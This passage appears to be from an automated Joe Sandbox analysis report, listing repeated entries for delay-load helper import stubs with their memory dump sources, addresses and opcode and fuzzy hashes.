                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d3b874918d707527243859aca51e0f2d9d73ea4b926c249b89bc404c8774c1bc
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: d3b874918d707527243859aca51e0f2d9d73ea4b926c249b89bc404c8774c1bc
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8a4a5045d980935fd3419ee152ed55b2b18261f4eecd28c37de217a0cfa39ebb
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: 8a4a5045d980935fd3419ee152ed55b2b18261f4eecd28c37de217a0cfa39ebb
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4286c3b599ebe7cfbb974bfdad98107c453bb6b59ea46c5b531840ce384ad46a
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: 4286c3b599ebe7cfbb974bfdad98107c453bb6b59ea46c5b531840ce384ad46a
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 55619fe774019eb670dd77675ef3bd71e1da98761592bbf54a05881a8dece6e3
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: 55619fe774019eb670dd77675ef3bd71e1da98761592bbf54a05881a8dece6e3
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: f09255a3a24d9da9ff75c39f4e6455c2b52446858da22e2ba53f6395ff4236c8
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: f09255a3a24d9da9ff75c39f4e6455c2b52446858da22e2ba53f6395ff4236c8
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ac1aead11898ab9eb04e511a1cdb9d52c375776126c7f8921f5b98f5dc2615b9
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: ac1aead11898ab9eb04e511a1cdb9d52c375776126c7f8921f5b98f5dc2615b9
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: bb4975ff91ef24721df9655d5bafa79e09c4f0603f50008ee27f0d3e1f9118dd
                                                            • Instruction ID: 42cfedde031aa86d141ed6eda300bc5563c3e7b6bcabcbfaba9ed4aae902f7cb
                                                            • Opcode Fuzzy Hash: bb4975ff91ef24721df9655d5bafa79e09c4f0603f50008ee27f0d3e1f9118dd
                                                            • Instruction Fuzzy Hash: 47A012E11540813C711412021C42C37024CC0C0B10730426DF430940C06E4048045432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 73d1c73de2458be19e671b531a173e4e40ee6bc1306bad9b072d3d881ba48749
                                                            • Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
                                                            • Opcode Fuzzy Hash: 73d1c73de2458be19e671b531a173e4e40ee6bc1306bad9b072d3d881ba48749
                                                            • Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a108b0f6285e6d03fe5754a3626347c4604da5613be4b7c08955af4284ad4053
                                                            • Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
                                                            • Opcode Fuzzy Hash: a108b0f6285e6d03fe5754a3626347c4604da5613be4b7c08955af4284ad4053
                                                            • Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 072b9cefa676d6ead28a7bf85564f04be632ea861a7d43959b420f2dec1e99cc
                                                            • Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
                                                            • Opcode Fuzzy Hash: 072b9cefa676d6ead28a7bf85564f04be632ea861a7d43959b420f2dec1e99cc
                                                            • Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3ac0fde907bfbf09230dffe78d6d1d27d0cc8be1d483ad3ff5bd12bad5dd7c72
                                                            • Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
                                                            • Opcode Fuzzy Hash: 3ac0fde907bfbf09230dffe78d6d1d27d0cc8be1d483ad3ff5bd12bad5dd7c72
                                                            • Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7d022eba684f318a4b679797d106526eed2e3bc2261caa05f0f49e784a9a5128
                                                            • Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
                                                            • Opcode Fuzzy Hash: 7d022eba684f318a4b679797d106526eed2e3bc2261caa05f0f49e784a9a5128
                                                            • Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: f3fe2c36269cc938479b38a7e2e23c6c5c164352dc0781a7abf4855c2a174c17
                                                            • Instruction ID: b03e137dea239ac2a108867f86e55a235b9d6f9e39e81e186b8e46c13b0ef048
                                                            • Opcode Fuzzy Hash: f3fe2c36269cc938479b38a7e2e23c6c5c164352dc0781a7abf4855c2a174c17
                                                            • Instruction Fuzzy Hash: B3A011C22A8082BCB00823A22C82C3B02ACC0C0B20B308BAEF822800C0BA8088080830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 81a1c72d932be4a8830e4c797792409e92c72f601b3a8486841994813127b89a
                                                            • Instruction ID: b03e137dea239ac2a108867f86e55a235b9d6f9e39e81e186b8e46c13b0ef048
                                                            • Opcode Fuzzy Hash: 81a1c72d932be4a8830e4c797792409e92c72f601b3a8486841994813127b89a
                                                            • Instruction Fuzzy Hash: B3A011C22A8082BCB00823A22C82C3B02ACC0C0B20B308BAEF822800C0BA8088080830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d0f09daa95efe89e7858837f32d19ae9f9c0265833be6b6f24e9f8ce87713ee3
                                                            • Instruction ID: f9e4576e9ea6a981097b8f59dff244f082a4516a9f32fadc0aab48abf25997e4
                                                            • Opcode Fuzzy Hash: d0f09daa95efe89e7858837f32d19ae9f9c0265833be6b6f24e9f8ce87713ee3
                                                            • Instruction Fuzzy Hash: 3AA011C22A80803CB00823A22C82C3B02ACC0E0B22B3083AEF820A00C0BA8088080830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6d6f84fce9d6fd765e275c061240c6bd85759acdda8ed0383bf22aafc33e4384
                                                            • Instruction ID: cf50fa866db7c662458ae860af32f393ef7fc6027cdbdf12244d0cd71bb0b94c
